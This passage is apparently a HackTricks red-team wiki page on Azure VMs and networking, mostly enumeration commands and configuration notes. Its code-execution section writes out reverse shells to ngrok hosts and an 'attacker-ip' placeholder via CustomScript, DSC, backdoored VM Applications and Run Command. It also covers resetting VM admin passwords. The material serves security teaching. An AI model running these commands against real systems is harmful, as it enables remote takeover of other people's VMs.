Az - Virtual Machines & Network

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure Networking Basic Info

Azure networking is made up of several entities and ways of configuring them. You can find brief descriptions, examples and enumeration commands for the different Azure network entities in:

Az - Azure Network

VMs Basic information

Azure Virtual Machines (VMs) are flexible, on-demand cloud-based servers that let you run Windows or Linux operating systems. They allow you to deploy applications and workloads without managing physical hardware. Azure VMs can be configured with various CPU, memory, and storage options to meet specific needs and integrate with Azure services like virtual networks, storage, and security tools.

Security Configurations

  • Availability Zones: Availability zones are distinct groups of datacenters within a specific Azure region that are physically separated to minimize the risk of several zones being affected by a local outage or disaster.
  • Security Type:
    • Standard Security: The default security type; it does not require any specific configuration.
    • Trusted Launch: Enhances protection against bootkits and kernel-level malware by using Secure Boot and a virtual Trusted Platform Module (vTPM).
    • Confidential VMs: On top of Trusted Launch, offers hardware-based isolation between the VM, the hypervisor and host management, improves disk encryption and more.
  • Authentication: By default a new SSH key pair is generated, although it's possible to supply your own public key or reuse a key already stored in Azure; the default username is azureuser. Password authentication can also be configured.
  • VM disk encryption: The disk is encrypted at rest by default using a platform-managed key.
    • It's also possible to enable Encryption at host, where data is encrypted on the host before it is sent to the storage service, giving end-to-end encryption between the host and the storage service (docs).
  • NIC network security group:
    • None: No NSG is attached to the NIC, so nothing filters traffic at the NIC level (only an NSG on the subnet, if one exists, applies).
    • Basic: Lets you easily open the inbound ports HTTP (80), HTTPS (443), SSH (22) and RDP (3389) to any source.
    • Advanced: Select an existing security group.
  • Backup: It's possible to enable Standard backup (once a day) or Enhanced backup (multiple times per day).
  • Patch orchestration options: Automatically apply patches to the VMs according to the selected policy, as described in the docs.
  • Alerts: It's possible to automatically receive alerts by email or mobile app when something happens in the VM. Default rules:
    • Percentage CPU is greater than 80%
    • Available Memory Bytes is less than 1GB
    • Data Disks IOPS Consumed Percentage is greater than 95%
    • OS IOPS Consumed Percentage is greater than 95%
    • Network In Total is greater than 500GB
    • Network Out Total is greater than 200GB
    • VmAvailabilityMetric is less than 1
  • Health monitor: By default checks protocol HTTP on port 80.
  • Locks: Allow locking a VM so it can only be read (ReadOnly lock) or can be read and updated but not deleted (CanNotDelete lock).
    • Most VM-related resources also support locks, like disks, snapshots…
    • Locks can also be applied at resource group and subscription level.
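The NIC NSG options above decide what reaches the VM, and the rules themselves are evaluated by ascending priority, first match wins, with the platform default rules (65000, 65001 and 65500) behind the custom ones. As an added example (not code from the original page or from Microsoft), the following Python script reproduces that evaluation for inbound traffic. It takes rules in the JSON shape printed by `az network nsg rule list` (the embedded rules are constructed) and flags which common management ports an arbitrary Internet address can reach. The VNet address space, the local approximation of the Internet/VirtualNetwork/AzureLoadBalancer service tags and the sample addresses are assumptions of the example.

```python
"""Evaluate Azure NSG inbound rules the way the platform does.

Added example for this page, not code from the original page or Microsoft.
Rules are processed by ascending priority, first match wins, and the
platform default rules (65000-65500) sit behind the custom ones. Input is
shaped like `az network nsg rule list` JSON (constructed sample below).
Service tags are approximated locally; Azure resolves them from real prefix
lists, so treat this as a triage aid, not the effective-rules API."""
import ipaddress

# Assumptions for this example: the VNet address space behind the
# VirtualNetwork tag and the ranges that are never "Internet".
VNET_SPACES = [ipaddress.ip_network("10.0.0.0/16")]
NON_INTERNET = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]
AZURE_LB_PROBE = ipaddress.ip_address("168.63.129.16")

# Default inbound rules every NSG carries implicitly.
DEFAULT_INBOUND = [
    {"name": "AllowVnetInBound", "priority": 65000, "direction": "Inbound", "access": "Allow",
     "protocol": "*", "sourceAddressPrefix": "VirtualNetwork",
     "destinationAddressPrefix": "VirtualNetwork", "destinationPortRange": "*"},
    {"name": "AllowAzureLoadBalancerInBound", "priority": 65001, "direction": "Inbound",
     "access": "Allow", "protocol": "*", "sourceAddressPrefix": "AzureLoadBalancer",
     "destinationAddressPrefix": "*", "destinationPortRange": "*"},
    {"name": "DenyAllInBound", "priority": 65500, "direction": "Inbound", "access": "Deny",
     "protocol": "*", "sourceAddressPrefix": "*", "destinationAddressPrefix": "*",
     "destinationPortRange": "*"},
]


def port_matches(spec, port):
    """spec is "*", "22", "20-25" or a list of those (the *PortRanges form)."""
    if isinstance(spec, list):
        return any(port_matches(s, port) for s in spec)
    if spec == "*":
        return True
    lo, _, hi = spec.partition("-")
    return int(lo) <= port <= int(hi or lo)


def prefix_matches(prefix, ip):
    """prefix is "*", a service tag, a CIDR/IP, or a list of those."""
    if isinstance(prefix, list):
        return any(prefix_matches(p, ip) for p in prefix)
    addr = ipaddress.ip_address(ip)
    if prefix == "*":
        return True
    if prefix == "VirtualNetwork":
        return any(addr in net for net in VNET_SPACES)
    if prefix == "Internet":
        return not any(addr in net for net in NON_INTERNET + VNET_SPACES)
    if prefix == "AzureLoadBalancer":
        return addr == AZURE_LB_PROBE
    return addr in ipaddress.ip_network(prefix, strict=False)


def evaluate(rules, src_ip, dst_ip, dst_port, protocol="Tcp"):
    """Return (access, rule_name) of the first inbound rule that matches."""
    inbound = [r for r in rules if r["direction"] == "Inbound"] + DEFAULT_INBOUND
    for r in sorted(inbound, key=lambda rule: rule["priority"]):
        if (r["protocol"] in ("*", protocol)
                and prefix_matches(r.get("sourceAddressPrefix") or r.get("sourceAddressPrefixes"), src_ip)
                and prefix_matches(r.get("destinationAddressPrefix") or r.get("destinationAddressPrefixes"), dst_ip)
                and port_matches(r.get("destinationPortRange") or r.get("destinationPortRanges"), dst_port)):
            return r["access"], r["name"]
    return "Deny", "implicit"  # not reached: DenyAllInBound matches everything


def internet_exposed_ports(rules, vm_ip, ports=(22, 3389, 80, 443, 445, 5985, 5986)):
    """Ports on vm_ip that an arbitrary Internet source is allowed to reach."""
    probe = "198.51.100.7"  # constructed Internet source address
    return [p for p in ports if evaluate(rules, probe, vm_ip, p)[0] == "Allow"]


# Constructed sample shaped like `az network nsg rule list -o json` output.
SAMPLE_RULES = [
    {"name": "AllowSSHFromOffice", "priority": 100, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "203.0.113.0/24",
     "destinationAddressPrefix": "*", "destinationPortRange": "22"},
    {"name": "DenySSHFromInternet", "priority": 200, "direction": "Inbound", "access": "Deny",
     "protocol": "Tcp", "sourceAddressPrefix": "Internet",
     "destinationAddressPrefix": "*", "destinationPortRange": "22"},
    {"name": "AllowRDPAny", "priority": 300, "direction": "Inbound", "access": "Allow",
     "protocol": "*", "sourceAddressPrefix": "*",  # the risky one
     "destinationAddressPrefix": "*", "destinationPortRange": "3389"},
    {"name": "AllowWeb", "priority": 310, "direction": "Inbound", "access": "Allow",
     "protocol": "Tcp", "sourceAddressPrefix": "Internet", "destinationAddressPrefix": "*",
     "destinationPortRange": None, "destinationPortRanges": ["80", "443"]},
]

if __name__ == "__main__":
    for port in (22, 3389, 8080):
        print(port, evaluate(SAMPLE_RULES, "198.51.100.7", "10.0.1.4", port))
    print("Internet-exposed:", internet_exposed_ports(SAMPLE_RULES, "10.0.1.4"))
```

Feed it real data with `az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> -o json`. Note that the `--query` used in the enumeration commands on this page only keeps the singular `sourceAddressPrefix`/`destinationPortRange` fields, so rules defined with the plural `*Prefixes`/`*Ranges` lists show up as null there. The authoritative per-NIC answer (subnet NSG and NIC NSG combined, with real service tag prefixes) comes from `az network nic list-effective-nsg`.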

Disks & snapshots

  • It's possible to enable shared disks so a disk can be attached to two or more VMs.
  • By default every disk is encrypted with a platform-managed key.
    • Same for snapshots.
  • By default the disk can be exported from all networks, but access can also be restricted to specific private endpoints, or public and private access can be disabled completely.
    • Same for snapshots.
  • It's possible to generate a SAS URI (valid for at most 60 days) to export the disk, which can be configured to require authentication or not.
    • Same for snapshots.

# List all disks
az disk list --output table

# Get info about a disk
az disk show --name <disk-name> --resource-group <rsc-group>

A VM image is a template containing the operating system, application settings and the filesystem needed to create a new virtual machine (VM). The difference between an image and a disk snapshot is that a disk snapshot is a read-only, point-in-time copy of a single managed disk, used mainly for backup or troubleshooting, whereas an image can contain multiple disks and is built to be used as a template for creating new VMs.
Images can be managed in the Images section of Azure or inside Azure compute galleries, which allow versioning and sharing an image cross-tenant or even making it public.

A restore point stores the VM configuration and point-in-time, application-consistent snapshots of all the managed disks attached to the VM. It is tied to the VM and its purpose is to allow restoring that VM to the state it was in at that specific point in time.

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shared with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group> --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

Azure Site Recovery

From the docs: Site Recovery helps ensure business continuity by keeping business apps and workloads running during outages. Site Recovery replicates workloads running on physical and virtual machines (VMs) from a primary site to a secondary location. When an outage occurs at your primary site, you fail over to the secondary location and access apps from there. After the primary location is running again, you can fail back to it.

Azure Bastion

Azure Bastion provides secure and seamless Remote Desktop Protocol (RDP) and Secure Shell (SSH) access to your virtual machines (VMs) directly through the Azure Portal or via a jump box, removing the need for public IP addresses on your VMs.

Bastion is deployed into a dedicated subnet named AzureBastionSubnet (a /26 or larger) in the VNet it needs to serve. It then allows connecting to internal VMs through the browser using RDP and SSH while avoiding exposing the VMs' ports to the Internet. It can also act as a jump host.

To list all Azure Bastion hosts in your subscription and connect to VMs through them, you can use the following commands:

# List bastions
az network bastion list -o table

# Connect via SSH through bastion
az network bastion ssh \
--name MyBastion \
--resource-group MyResourceGroup \
--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \
--auth-type ssh-key \
--username azureuser \
--ssh-key ~/.ssh/id_rsa

# Connect via RDP through bastion
az network bastion rdp \
--name <BASTION_NAME> \
--resource-group <RESOURCE_GROUP> \
--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \
--auth-type password \
--username <VM_USERNAME> \
--password <VM_PASSWORD>

Metadata

The Azure Instance Metadata Service (IMDS) provides information about running virtual machine instances to help manage and configure them. It exposes details such as SKU, storage, network configuration and upcoming maintenance events through a REST API available at the non-routable IP address 169.254.169.254, which is reachable only from within the VM. Communication between the VM and IMDS never leaves the host. When querying IMDS, HTTP clients inside the VM must bypass web proxies, otherwise the request never reaches the service.

Additionally, to talk to the metadata endpoint the HTTP request must carry the header Metadata: true and must not carry an X-Forwarded-For header (requests that include it are rejected).

When requesting an access token from the metadata endpoint, by default the metadata service uses the system-assigned managed identity to generate the token, if one exists. If there is only ONE user-assigned managed identity (and no system-assigned one), that one is used by default. However, if there is no system-assigned managed identity and several user-assigned managed identities, the metadata service returns an error indicating that there are multiple managed identities and you must specify which one to use (via client_id, object_id or msi_res_id).

Check how to enumerate it in:

Cloud SSRF - HackTricks

VM Enumeration

# VMs
## List all VMs and get info about one
az vm list --output table
az vm show --name <vm-name> --resource-group <rsc-group>

## List all available VM images (all publishers, takes a while)
az vm image list --all --output table

# VM Extensions
## List all available VM extension images (takes a few minutes)
az vm extension image list --output table

## Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

## List extensions in a VM
az vm extension list -g <rsc-group> --vm-name <vm-name>

## List managed identities in a VM
az vm identity show \
--resource-group <rsc-group> \
--name <vm-name>

# Disks
## List all disks and get info about one
az disk list --output table
az disk show --name <disk-name> --resource-group <rsc-group>

# Snapshots
## List all snapshots and get info about one
az snapshot list --output table
az snapshot show --name <name> --resource-group <rsc-group>

# Shared Image Galleries | Compute Galleries
## List all galleries and get info about one
az sig list --output table
az sig show --gallery-name <name> --resource-group <rsc-group>

## List all community galleries
az sig list-community --output table

## List galleries shared with me
az sig list-shared --location <location> --output table

## List all image definitions in a gallery and get info about one
az sig image-definition list --gallery-name <name> --resource-group <rsc-group> --output table
az sig image-definition show --gallery-image-definition <name> --gallery-name <gallery-name> --resource-group <rsc-group>

## List all the versions of an image definition in a gallery
az sig image-version list --gallery-image-name <image-name> --gallery-name <gallery-name> --resource-group <rsc-group> --output table

## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

# Images
# List all managed images in your subscription
az image list --output table

# Restore points
## List all restore points and get info about 1
az restore-point collection list-all --output table
az restore-point collection show --collection-name <collection-name> --resource-group <rsc-group>

# Bastion
## list all bastions
az network bastion list -o table

# Network
## List VNets
az network vnet list --query "[].{name:name, location:location, addressSpace:addressSpace}"

## List subnets of a VNet
az network vnet subnet list --resource-group <ResourceGroupName> --vnet-name <VNetName> --query "[].{name:name, addressPrefix:addressPrefix}" -o table

## List public IPs
az network public-ip list --output table

## Get NSG rules
az network nsg rule list --nsg-name <NSGName> --resource-group <ResourceGroupName> --query "[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}" -o table

## Get NICs and subnets using this NSG
az network nsg show --name MyLowCostVM-nsg --resource-group Resource_Group_1 --query "{subnets: subnets, networkInterfaces: networkInterfaces}"

## List all Nics & get info of a single one
az network nic list --output table
az network nic show --name <name> --resource-group <rsc-group>

## List Azure Firewalls
az network firewall list --query "[].{name:name, location:location, subnet:subnet, publicIp:publicIp}" -o table

## Get network rules of a firewall
az network firewall network-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get application rules of a firewall
az network firewall application-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## Get nat rules of a firewall
az network firewall nat-rule collection list --firewall-name <FirewallName> --resource-group <ResourceGroupName> --query "[].{name:name, rules:rules}" -o table

## List Route Tables
az network route-table list --query "[].{name:name, resourceGroup:resourceGroup, location:location}" -o table

## List routes for a table
az network route-table route list --route-table-name <RouteTableName> --resource-group <ResourceGroupName> --query "[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}" -o table

# Misc
## List all virtual machine scale sets
az vmss list --output table

## List all availability sets
az vm availability-set list --output table

## List all load balancers
az network lb list --output table

## List all storage accounts
az storage account list --output table

## List all extensions (e.g. custom script) installed on a specific VM
az vm extension list --vm-name <vm-name> --resource-group <resource-group>

## Get the boot diagnostics serial log of a specific VM
az vm boot-diagnostics get-boot-log --name <vm-name> --resource-group <resource-group>

## List all tags on virtual machines
az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[].{Name:name, Tags:tags}" --output table

## List the run commands available for virtual machines in a location
az vm run-command list --location <location> --output table

Code Execution in VMs

VM Extensions

Azure VM extensions are small applications that provide post-deployment configuration and automation tasks on Azure virtual machines (VMs).

This makes it possible to execute arbitrary code inside the VMs.

The required permission is Microsoft.Compute/virtualMachines/extensions/write.

It's possible to list all the available extensions with:

# It takes some mins to run
az vm extension image list --output table

# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table

It's possible to run custom extensions that execute custom code:

  • Execute a reverse shell
# Prepare the rev shell
echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==

# Execute rev shell
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
  • Execute a script hosted on the internet
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'

Useful VM extensions

The required permission is still Microsoft.Compute/virtualMachines/extensions/write.

VMAccess extension

This extension allows changing the password (or creating the user if it doesn't exist) of users inside Windows VMs.

# Run VMAccess extension to reset the password
$cred = Get-Credential # Username and password to reset (the user is created if it doesn't exist). The "Administrator" username is allowed
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred

DesiredStateConfiguration (DSC)

This is a Microsoft VM extension that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to execute arbitrary commands on Windows VMs through this extension:

# Content of revShell.ps1
Configuration RevShellConfig {
    Node localhost {
        Script ReverseShell {
            GetScript = { @{} }
            SetScript = {
                $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
                $stream = $client.GetStream();
                [byte[]]$bytes = 0..65535|%{0};
                while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
                    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
                    $sendback = (iex $data 2>&1 | Out-String );
                    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
                    $stream.Write($sendbyte, 0, $sendbyte.Length)
                }
                $client.Close()
            }
            TestScript = { return $false }
        }
    }
}
RevShellConfig -OutputPath .\Output

# Upload config to blob
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
    -ConfigurationPath .\revShell.ps1 `
    -ResourceGroupName $resourceGroup `
    -StorageAccountName $storageName `
    -Force

# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
    -Version '2.76' `
    -ResourceGroupName $resourceGroup `
    -VMName $vmName `
    -ArchiveStorageAccountName $storageName `
    -ArchiveBlobName 'revShell.ps1.zip' `
    -AutoUpdate `
    -ConfigurationName 'RevShellConfig'

Hybrid Runbook Worker

This is a VM extension that allows executing runbooks on VMs from an automation account. For more information check the Automation Accounts service.

VM Applications

These are packages containing all the application data plus install and uninstall scripts, which can be used to easily add and remove applications in VMs.

# List all galleries in resource group
az sig list --resource-group <res-group> --output table

# List all apps in a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table

These are the paths where applications are downloaded inside the file system:

  • Linux: /var/lib/waagent/Microsoft.CPlat.Core.VMApplicationManagerLinux/<appname>/<app version>
  • Windows: C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.9\Downloads\<appname>\<app version>

Check how to install new applications in https://learn.microsoft.com/en-us/azure/virtual-machines/vm-applications-how-to?tabs=cli

Caution

It's possible to share individual apps and galleries with other subscriptions or tenants. This is very interesting because it could allow an attacker to backdoor an application and pivot to other subscriptions and tenants.

However, there is no "marketplace" for VM apps like there is for extensions.

The required permissions are:

  • Microsoft.Compute/galleries/applications/write
  • Microsoft.Compute/galleries/applications/versions/write
  • Microsoft.Compute/virtualMachines/write
  • Microsoft.Network/networkInterfaces/join/action
  • Microsoft.Compute/disks/write

Exploitation example to execute arbitrary commands:

# Create gallery (if there isn't one already)
az sig create --resource-group myResourceGroup \
--gallery-name myGallery --location "West US 2"

# Create application container
az sig gallery-application create \
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"

# Create app version with the rev shell
## In the package file link just add any link to a blob storage file
az sig gallery-application version create \
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"

# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true

User data

This is persistent data that can be retrieved from the metadata endpoint at any time. Note that in Azure user data differs from AWS and GCP: if you put a script here it is not executed by default.

Custom data

It's possible to pass some data to the VM that will be stored in well-known paths:

  • On Windows custom data is placed in %SYSTEMDRIVE%\AzureData\CustomData.bin as a binary file and is not processed.
  • On Linux it used to be placed in /var/lib/waagent/ovf-env.xml and is now stored in /var/lib/waagent/CustomData/ovf-env.xml
    • Linux agent: Does not process custom data by default; a custom image with data processing enabled is required.
    • cloud-init: Processes custom data by default, and the data can be in several formats. It can easily execute a script simply by sending the script as the custom data.
      • I tested that both Ubuntu and Debian execute the script you put here.
      • It also isn't necessary to enable user data for this to be executed.

#!/bin/sh
echo "Hello World" > /var/tmp/output.txt

Run Command

This is the most basic way Azure offers to execute arbitrary commands in VMs. The required permission is Microsoft.Compute/virtualMachines/runCommand/action.

# Create the script to run (reverse shell)
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh

# Execute it in the VM
az vm run-command invoke \
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh

Azure WireServer & GoalState

Azure VMs expose internal platform endpoints used for configuration, metadata retrieval and identity management. Understanding the differences between them is important for enumeration, privilege escalation and post-exploitation.

Wire Server (Azure Fabric Endpoint)

The Azure WireServer is an internal Azure IP (168.63.129.16) used by the platform to communicate with the VM.

It is responsible for:

  • Communication with the VM Agent
  • Delivering:
    • GoalState
    • ExtensionsConfig
    • Internal VM configuration (including identities)
  • DHCP & DNS services
  • Health monitoring

GoalState & ExtensionsConfig

GoalState represents the desired configuration of the VM as defined by Azure. It can include:

  • Extensions configuration
  • Managed identities
  • Provisioning state
  • Agent instructions

ExtensionsConfig contains the detailed configuration of the VM extensions and can include:

  • User Assigned Managed Identities
  • Extension settings
  • Secrets (depending on the extension)

These endpoints are typically accessed via:

curl -H "x-ms-version: 2012-11-30" http://168.63.129.16/machine?comp=goalstate
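As an added example (not from the original page or from Microsoft), the Python below performs that exchange: it fetches GoalState with the required x-ms-version header and no proxy, pulls out the incarnation, container and role-instance identifiers plus the per-VM config URLs, then follows ExtensionsConfig to list the extension handlers and their settings. The embedded XML documents are constructed in the shape the open-source Azure Linux Agent (WALinuxAgent) parses; real values and attributes vary, and the IDs, URLs and thumbprint in them are placeholders.

```python
"""Parse Azure WireServer GoalState and ExtensionsConfig documents.

Added example for this page, not code from the original page or Microsoft.
The embedded XML is constructed in the shape the open-source Azure Linux
Agent (WALinuxAgent) consumes; real values, URLs and attributes differ.
GoalState requires the x-ms-version header; the config URLs it returns are
fetched with the same header. No proxy is used: like IMDS, the endpoint is
only reachable from the guest network stack."""
import json
import urllib.request
import xml.etree.ElementTree as ET

WIRESERVER = "http://168.63.129.16"
HEADERS = {"x-ms-version": "2012-11-30"}


def fetch(url, timeout=5):
    """GET a WireServer URL, ignoring any proxy configured in the environment."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(urllib.request.Request(url, headers=HEADERS), timeout=timeout) as resp:
        return resp.read().decode()


def parse_goal_state(xml_text):
    """Identifiers and per-VM config URLs from GoalState (first role instance)."""
    root = ET.fromstring(xml_text)
    role = root.find("./Container/RoleInstanceList/RoleInstance")
    return {
        "incarnation": root.findtext("Incarnation"),
        "expected_state": root.findtext("./Machine/ExpectedState"),
        "container_id": root.findtext("./Container/ContainerId"),
        "instance_id": role.findtext("InstanceId"),
        # HostingEnvironmentConfig / SharedConfig / ExtensionsConfig / Certificates ...
        "urls": {c.tag: c.text for c in role.find("Configuration")},
    }


def parse_extensions_config(xml_text):
    """Extension handlers plus their public settings; protected ones are only flagged."""
    root = ET.fromstring(xml_text)
    settings = {}
    for plugin in root.findall("./PluginSettings/Plugin"):
        runtime = json.loads(plugin.findtext("RuntimeSettings") or "{}")
        handler = runtime["runtimeSettings"][0]["handlerSettings"]
        settings[plugin.get("name")] = {
            "public": handler.get("publicSettings", {}),
            # protectedSettings is encrypted to the VM's transport certificate,
            # so the XML alone never yields the plaintext (e.g. commandToExecute)
            "has_protected": "protectedSettings" in handler,
            "cert_thumbprint": handler.get("protectedSettingsCertThumbprint"),
        }
    return [
        {"name": p.get("name"), "version": p.get("version"), "state": p.get("state"),
         "package_url": p.get("location"), **settings.get(p.get("name"), {})}
        for p in root.findall("./Plugins/Plugin")
    ]


# Constructed sample documents (placeholder IDs, URLs and thumbprint).
SAMPLE_GOAL_STATE = """<GoalState>
  <Version>2012-11-30</Version>
  <Incarnation>3</Incarnation>
  <Machine><ExpectedState>Started</ExpectedState></Machine>
  <Container>
    <ContainerId>11111111-2222-3333-4444-555555555555</ContainerId>
    <RoleInstanceList>
      <RoleInstance>
        <InstanceId>_myvm</InstanceId>
        <State>Started</State>
        <Configuration>
          <HostingEnvironmentConfig>http://168.63.129.16:80/machine/11111111-2222-3333-4444-555555555555/_myvm?comp=config&amp;type=hostingEnvironmentConfig&amp;incarnation=3</HostingEnvironmentConfig>
          <SharedConfig>http://168.63.129.16:80/machine/11111111-2222-3333-4444-555555555555/_myvm?comp=config&amp;type=sharedConfig&amp;incarnation=3</SharedConfig>
          <ExtensionsConfig>http://168.63.129.16:80/machine/11111111-2222-3333-4444-555555555555/_myvm?comp=config&amp;type=extensionsConfig&amp;incarnation=3</ExtensionsConfig>
          <Certificates>http://168.63.129.16:80/machine/11111111-2222-3333-4444-555555555555/_myvm?comp=certificates&amp;incarnation=3</Certificates>
        </Configuration>
      </RoleInstance>
    </RoleInstanceList>
  </Container>
</GoalState>"""

SAMPLE_EXTENSIONS_CONFIG = """<Extensions version="1.0.0.0" goalStateIncarnation="3">
  <Plugins>
    <Plugin name="Microsoft.Azure.Extensions.CustomScript" version="2.1.10" state="enabled"
            location="https://example.blob.core.windows.net/pkg/CustomScript.zip" />
  </Plugins>
  <PluginSettings>
    <Plugin name="Microsoft.Azure.Extensions.CustomScript" version="2.1.10">
      <RuntimeSettings seqNo="0">{"runtimeSettings":[{"handlerSettings":{"publicSettings":{"fileUris":["https://example.test/hacktricks_touch.sh"]},"protectedSettings":"MIIB...","protectedSettingsCertThumbprint":"ABCDEF0123456789"}}]}</RuntimeSettings>
    </Plugin>
  </PluginSettings>
</Extensions>"""

if __name__ == "__main__":
    # Live use from inside an Azure VM: GoalState first, then its ExtensionsConfig URL.
    gs = parse_goal_state(fetch(f"{WIRESERVER}/machine?comp=goalstate"))
    print(json.dumps(gs, indent=2))
    if gs["urls"].get("ExtensionsConfig"):
        print(json.dumps(parse_extensions_config(fetch(gs["urls"]["ExtensionsConfig"])), indent=2))
```

Only the public settings are readable this way: protectedSettings is ciphertext for the VM's transport certificate, which is why the Custom Script payloads on this page are passed in --protected-settings. Run it from a context that can actually reach 168.63.129.16; as the access considerations below explain, that is not guaranteed for every process in the guest.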

Access considerations

The WireServer IP is generally reachable from inside the VM through the guest network stack. It is not restricted to the Azure VM Agent, Run Command or VM extensions. Microsoft even documents agentless Linux provisioning examples where ordinary scripts inside the guest query GoalState directly from 168.63.129.16.

However, not every process will get the same results in practice:

  • Some endpoints require Azure-specific headers, such as x-ms-version: 2012-11-30 for GoalState.
  • Local guest controls can block or alter access, including host firewall rules, proxies, routes, network namespaces, containers or endpoint protection.
  • VM extensions and Run Command usually run as root/SYSTEM through the VM Agent, so they can bypass local OS restrictions that affect an ordinary interactive user.
  • Some data is agent/extension-specific and can depend on the VM's provisioning state, the installed agent, the configured extensions or the managed identity configuration.

So if a request works from Run Command but fails from SSH, the usual explanation is a difference in OS user, environment, routing, proxy, firewall or namespace, not a general Azure rule that only agent contexts can reach 168.63.129.16.

In lab testing this difference was visible: Linux/Windows VM Agent execution through Run Command or Custom Script extensions could reach GoalState at 168.63.129.16, while a regular SSH session on a different Linux VM could still reach IMDS but timed out when querying GoalState. Treat WireServer/GoalState as useful but environment-dependent; don't rely on it as the primary way to enumerate managed identities.

Managed Identity Access From Inside the VM

The reliable way to use a VM's managed identities is the IMDS managed identity endpoint at 169.254.169.254, not the WireServer ExtensionsConfig XML. Scripts that only look for UserAssignedIdentity nodes inside ExtensionsConfig are unreliable because:

